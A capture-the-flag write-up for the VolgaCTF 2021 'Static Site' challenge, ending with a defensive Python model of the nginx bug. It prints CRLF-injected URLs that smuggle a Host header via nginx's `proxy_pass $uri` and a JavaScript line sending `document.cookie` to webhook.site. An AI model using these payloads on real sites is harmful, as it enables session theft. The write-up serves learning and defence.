VolgaCTF 2021 Qualifier - Static Site
aszx87410 opened this issue
Huli commented
## Static Site

### Description
nginx config

```nginx
server {
    listen 443 ssl;
    resolver 8.8.8.8;
    server_name static-site.volgactf-task.ru;
    ssl_certificate /etc/letsencrypt/live/volgactf-task.ru/fullchain1.pem;
    ssl_certificate_key /etc/letsencrypt/live/volgactf-task.ru/privkey1.pem;
    add_header Content-Security-Policy "default-src 'self'; object-src 'none'; frame-src https://www.google.com/recaptcha/; font-src https://fonts.gstatic.com/; style-src 'self' https://fonts.googleapis.com/; script-src 'self' https://www.google.com/recaptcha/api.js https://www.gstatic.com/recaptcha/" always;
    location / {
        root /var/www/html;
    }
    location /static/ {
        proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
    }
}
```
index.html

```html
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Static Site</title>
    <link rel="stylesheet" href="./static/bootstrap.min.css">
  </head>
  <body class="text-center">
    <div class="cover-container d-flex h-100 p-3 mx-auto flex-column">
      <header class="mt-5">
        <h3 class="masthead-brand">Static Site</h3>
      </header>
      <main role="main" class="mt-5">
        <p class="lead"><img src="./static/hacker.gif"/></p>
        <p class="lead pt-5">
          Ok, hackers, I created a static site with a strict Content-Security-Policy.
        </p>
        <p class="lead">
          It is simply impossible to steal my cookies now!
        </p>
        <p class="lead">
          But, you can still try:
        </p>
        <p>
          <form id="form" class="form-inline justify-content-center" method="POST" action="https://bot-static-site.volgactf-task.ru/">
            <div class="form-group">
              <label for="url">URL</label>
              <input type="url" name="url" id="url" class="form-control mx-sm-3">
              <input type="submit" class="btn btn-secondary g-recaptcha" data-sitekey="6LdN230aAAAAAPsMXHWZ9szidC6tbkSzWDarMqmL" data-callback="onSubmit" data-action="submit">
            </div>
          </form>
        </p>
      </main>
    </div>
    <script src="https://www.google.com/recaptcha/api.js"></script>
    <script src="./static/captcha.js"></script>
  </body>
</html>
```
### Writeup

After reviewing the nginx config and the html file, this part caught my eye:
```nginx
location /static/ {
    proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
}
```
Then I googled `nginx $uri vulnerability` and found some useful resources:
We can use CRLF injection to change the request. I am not familiar with nginx, so I created an environment on my local machine to see how I could use it. After playing for a while I found that I can fake the Host header to read a file from my own bucket:

```
https://static-site.volgactf-task.ru/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:
```
So the solution is straightforward:

- create my own S3 bucket
- upload `/static/index.html`
- upload `/static/app.js`
- let the bot visit `https://static-site.volgactf-task.ru/static/index.html%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:`
- XSS triggered!
html file

```html
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  </head>
  <body class="text-center">
    hello
    <script src="/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:"></script>
  </body>
</html>
```
js file

```js
window.location = 'https://webhook.site?c='+document.cookie
```
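To make the root cause concrete from the defender's side, here is an added example (not part of the original writeup) that models the upstream request nginx builds for three `proxy_pass` styles: the vulnerable `https://host$uri` form, where the percent-decoded `$uri` is inserted verbatim, and two safe forms, `https://host;` (raw request URI forwarded unchanged) and `https://host/;` (normalised path re-escaped). It is a simplified model of nginx's behaviour rather than nginx code, the attacker bucket name is a constructed placeholder, and the last function is the kind of check a reverse proxy or WAF can apply to reject such paths.

```python
from urllib.parse import quote, unquote

UPSTREAM_HOST = "volga-static-site.s3.amazonaws.com"

# Constructed sample: the encoded path from the writeup, with the attacker's
# bucket name replaced by a placeholder.
ATTACK_PATH = ("/static/app.js%20HTTP/1.0%0d%0a"
               "Host:%20attacker-bucket.s3.amazonaws.com%0d%0ayo:")


def upstream_request(raw_path: str, mode: str) -> bytes:
    """Approximate the request nginx sends upstream for three proxy_pass styles.

    'variable'  proxy_pass https://host$uri;  $uri is the percent-decoded,
                normalised path and variable values are inserted verbatim.
    'no_uri'    proxy_pass https://host;      the raw request URI is forwarded
                unchanged, still percent-encoded.
    'with_uri'  proxy_pass https://host/;     the normalised path is re-escaped
                before it is sent upstream.
    Simplified model of nginx's behaviour, not its code.
    """
    if mode == "variable":
        path = unquote(raw_path)
    elif mode == "no_uri":
        path = raw_path
    elif mode == "with_uri":
        path = quote(unquote(raw_path), safe="/")
    else:
        raise ValueError(mode)
    return (f"GET {path} HTTP/1.0\r\n"
            f"Host: {UPSTREAM_HOST}\r\n"
            f"Connection: close\r\n\r\n").encode()


def host_headers(request: bytes) -> list:
    """Parse the request as the upstream would and return every Host value.
    More than one value means a header was smuggled through the path."""
    head, _, _ = request.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")[1:]            # drop the request line
    return [line.split(b":", 1)[1].strip().decode()
            for line in lines if line.lower().startswith(b"host:")]


def smuggles_headers(raw_path: str) -> bool:
    """Defender-side check: would this path, once decoded into $uri, break out
    of the request line?  Rejects CR, LF or space in the decoded path."""
    decoded = unquote(raw_path)
    return any(c in decoded for c in "\r\n ")
```

With the `variable` style the upstream sees two Host headers, the injected one first; with either safe style it sees only the real one.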